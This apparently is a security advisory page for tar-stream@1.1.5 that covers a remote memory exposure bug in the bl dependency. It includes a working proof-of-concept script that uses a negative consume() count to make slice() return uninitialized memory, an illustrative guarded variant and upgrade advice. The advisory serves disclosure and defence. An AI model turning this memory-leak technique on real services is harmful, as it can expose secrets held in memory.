tar-stream@1.1.5

Vulnerabilities

1 via 1 paths

Dependencies

10

Source

npm



high severity

Remote Memory Exposure

  • Vulnerable module: bl
  • Introduced through: bl@0.9.5

Detailed paths

  • Introduced through: tar-stream@1.1.5 > bl@0.9.5
    Remediation: Upgrade to tar-stream@1.2.1.

Overview

bl is a library that collects buffers and exposes them through a standard readable buffer interface.

Affected versions of this package are vulnerable to Remote Memory Exposure. If user input reaches the consume() argument and can be negative, the BufferList's internal state is corrupted, and ordinary .slice() calls then return uninitialized memory.

PoC by chalker

const { BufferList } = require('bl')
// 256 random bytes stand in for sensitive data that was held in memory.
const secret = require('crypto').randomBytes(256)
for (let i = 0; i < 1e6; i++) {
  // A fresh copy that is freed every iteration, so it may linger in reused memory.
  const clone = Buffer.from(secret)
  const bl = new BufferList()
  bl.append(Buffer.from('a'))
  // Negative count: corrupts the list's offset/length bookkeeping.
  bl.consume(-1024)
  // slice() now returns uninitialized memory instead of the appended byte.
  const buf = bl.slice(1)
  if (buf.indexOf(clone) !== -1) {
    console.error(`Match (at ${i})`, buf)
  }
}
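To make the mechanism in the overview concrete, here is a simplified buffer-list model written for this page (it is not bl's own code, and `ModelBufferList`, `GuardedBufferList` and `compare` are names chosen for the illustration): the unguarded consume() lets a negative count push the offset negative and inflate length, so slice() hands back an allocUnsafe buffer it never fills, while the guarded variant validates the argument before it can touch the bookkeeping.

```javascript
// Simplified model of a buffer list (an assumption for this illustration, not bl's
// code): a queue of chunks, an `offset` into the first chunk, and a running `length`
// that slice() trusts when sizing its output.
class ModelBufferList {
  constructor () { this.bufs = []; this.offset = 0; this.length = 0 }
  append (buf) { this.bufs.push(buf); this.length += buf.length; return this }
  // Unguarded consume(): a negative `bytes` never satisfies `bytes >= chunk.length`,
  // so it takes the partial-chunk branch, driving `offset` negative and inflating `length`.
  consume (bytes) {
    while (this.bufs.length) {
      if (bytes >= this.bufs[0].length) {
        bytes -= this.bufs[0].length
        this.length -= this.bufs[0].length
        this.bufs.shift()
      } else {
        this.offset += bytes
        this.length -= bytes
        break
      }
    }
    return this
  }
  // slice() allocates `end - start` bytes without zero-filling and copies only the
  // real data over it; an inflated `length` leaves the tail uninitialized.
  slice (start = 0, end = this.length) {
    const out = Buffer.allocUnsafe(Math.max(end - start, 0))
    const data = Buffer.concat(this.bufs).subarray(Math.max(this.offset, 0))
    data.copy(out, 0, start, Math.min(end, data.length))
    return out
  }
}

// Hardened variant: reject anything but a non-negative integer before it reaches state.
class GuardedBufferList extends ModelBufferList {
  consume (bytes) {
    if (!Number.isInteger(bytes) || bytes < 0) {
      throw new RangeError(`consume() expects a non-negative integer, got ${bytes}`)
    }
    return super.consume(bytes)
  }
}

// Feeds the PoC's input (one byte appended, then consume(-1024)) to both variants.
function compare () {
  const weak = new ModelBufferList().append(Buffer.from('a')).consume(-1024)
  const guarded = new GuardedBufferList().append(Buffer.from('a'))
  let verdict
  try { guarded.consume(-1024); verdict = 'accepted' } catch (e) { verdict = 'rejected' }
  return { weakLength: weak.length, weakSliceBytes: weak.slice(1).length, verdict }
}
```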

Remediation

Upgrade bl to version 2.2.1, 3.0.1, 4.0.3, 1.2.3 or higher.
